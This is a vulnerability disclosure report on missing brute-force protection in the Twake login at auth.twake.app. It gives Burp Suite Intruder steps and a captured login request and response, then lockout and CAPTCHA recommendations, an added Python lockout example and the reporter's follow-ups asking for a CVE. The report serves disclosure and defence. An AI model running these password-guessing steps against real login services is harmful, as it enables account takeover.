Lack of brute force protection in linagora/twake
Reported on
Feb 19th 2023
Issue Description
• A brute-force attack is an attempt to discover a password by systematically trying every possible combination of letters, numbers, and symbols until the attacker discovers the one correct combination that works.
Steps to Reproduce:
1. First, capture the login request with Burp Suite (turn on Intercept before logging in), then send the login request to Intruder.
2. Next, turn off the Burp Suite intercept, go back to Intruder, and under Payload Positions clear all highlighted payloads, highlight the password value in the HTTP request, and hit the Add button to set the payload position.
3. Then, go to the Payloads tab and load your password list.
4. Lastly, hit the Start Attack button.
Each attempt uses a different password value from the password list payload. If the correct password is in the list, a "302 Found" response is issued. Unsuccessful attempts return a "200" code with an "incorrect email & password" error message.
HTTP Request:
POST /oauth2/authorize?client_id=twakeconsole&redirect_uri=https%3A%2F%2Fconsole.twake.app%2Foidccallback&response_type=code&scope=openid+profile+email+address+phone+offline_access&state=27c159fcf184453097e882b0f7137c7a&code_challenge=QPm6HAG3RNCOWPUOpoEONYaTPii0hN1o8ogh7IIEpk4&code_challenge_method=S256&response_mode=query HTTP/2
Host: auth.twake.app
Cookie: ajs_anonymous_id=47592364-2607-4d03-ac78-8d5b5a75ff7d; sticky-sso=http://10.2.3.26:80; llnglanguage=en
Content-Length: 129
Cache-Control: max-age=0
Sec-Ch-Ua: "Not_A Brand";v="99", "Google Chrome";v="109", "Chromium";v="109"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://auth.twake.app
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://auth.twake.app/oauth2/authorize?client_id=twakeconsole&redirect_uri=https%3A%2F%2Fconsole.twake.app%2Foidccallback&response_type=code&scope=openid+profile+email+address+phone+offline_access&state=27c159fcf184453097e882b0f7137c7a&code_challenge=QPm6HAG3RNCOWPUOpoEONYaTPii0hN1o8ogh7IIEpk4&code_challenge_method=S256&response_mode=query
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
url=aHR0cHM6Ly9hdXRoLnR3YWtlLmFwcC8vb2F1dGgy&timezone=8&skin=twakeconsole&user=researcher.intigriti%40gmail.com&password=password
HTTP Response:
HTTP/2 302 Found
Date: Sun, 19 Feb 2023 18:13:12 GMT
Location: https://console.twake.app/oidccallback?code=6fb482b02aaf5645c50452d8f524c54e&state=27c159fcf184453097e882b0f7137c7a&session_state=V9FTH4VCAmVnOLvrgNk0HUTfkZ2oh3ZVj7bL28vs24Y%3D.bzN6RGw5dUdGS1ROZGhOS2gvTEw5YkpWcmVKSmFmTzB5bXZIcmR2TmMwaVVjOXdnc1JaelRiVEV0ZitBemEvS1cxT0lLMHdSMFBVY0JLOFk4bHFoVEE9PQ
Server: nginx/1.14.2
Set-Cookie: lemonldap=19eda7a4402f83afb6b1fe62945de765; domain=.twake.app; path=/; SameSite=Lax
Content-Length: 0
Recommendation
• The most obvious way to block brute-force attacks is to simply lock out accounts after a defined number of incorrect password attempts. Account lockouts can last a specific duration, such as one hour, or the accounts could remain locked until manually unlocked by an administrator.
• Another way is to add a CAPTCHA to the login form.
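An added example (not Twake's or LemonLDAP::NG's code) of the lockout policy recommended above: the counter is keyed on the user field of the login request, the account is locked after a defined number of wrong passwords for a fixed duration, and an administrator can unlock it manually. The threshold of 5 and the one-hour lockout are assumptions chosen to match the recommendation; the injectable clock is an assumption so the policy can be tested deterministically.

```python
# Added example (not Twake's or LemonLDAP::NG's code): the account lockout
# policy recommended above. The 5-failure threshold and one-hour lockout are
# the values the recommendation names; the injectable clock is an assumption
# so the policy can be exercised deterministically in a test.
import time
from dataclasses import dataclass

@dataclass
class AccountState:
    failures: int = 0          # wrong passwords since the last success
    locked_until: float = 0.0  # epoch seconds; 0 means not locked

class LockoutPolicy:
    def __init__(self, max_failures=5, lockout_seconds=3600, clock=time.time):
        self.max_failures = max_failures
        self.lockout_seconds = lockout_seconds
        self._clock = clock
        self._accounts: dict[str, AccountState] = {}

    def attempt(self, user: str, password_ok: bool) -> str:
        """Record one attempt for `user` (the 'user' form field); returns
        "locked", "ok" or "fail". A locked account is refused before the
        credential is considered, so a correct guess made during the lockout
        neither succeeds nor resets the counter."""
        now = self._clock()
        state = self._accounts.setdefault(user, AccountState())
        if state.locked_until > now:
            return "locked"
        if password_ok:
            state.failures = 0
            return "ok"
        state.failures += 1
        if state.failures >= self.max_failures:
            state.locked_until = now + self.lockout_seconds
            state.failures = 0  # start a fresh count once the lockout expires
            return "locked"
        return "fail"

    def seconds_locked(self, user: str) -> float:
        """Remaining lockout for `user`; 0 when the account is usable."""
        state = self._accounts.get(user)
        return max(0.0, state.locked_until - self._clock()) if state else 0.0

    def admin_unlock(self, user: str) -> None:
        """Manual unlock by an administrator, as the recommendation allows."""
        self._accounts.pop(user, None)
```

The login handler would call `attempt()` once per POST to the authorize endpoint and answer a "locked" result the same way as a wrong password, so the response does not reveal whether the guess was correct.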
Impact
• This vulnerability could allow an attacker to brute-force other users' accounts.
References
Hi Maintainer,
A gentle follow-up on this, please?
Regards, Jeffrey
Hi Maintainer, a reminder on this
Thank you.
Regards, Jeffrey
Hi Maintainer, a gentle reminder on this.
Cheers!
Jeffrey
Hi Maintainer,
May I follow up on this, please?
Thank you for your time,
Best Regards, Jeffrey
Hi Maintainer,
A gentle reminder on this, please?
Thank you,
Jeffrey
Hi Khaled,
Thank you so much for validating my report.
Appreciate it mate🙏.
Cheers, Jeffrey
Hi Maintainer,
A gentle follow-up on this, please?
Thank you for your time.
Regards, Jeffrey
Hello Maintainer,
It's been 2 months.
May I kindly request that a CVE be assigned, please?
Thank you for your time.
Regards, Jeffrey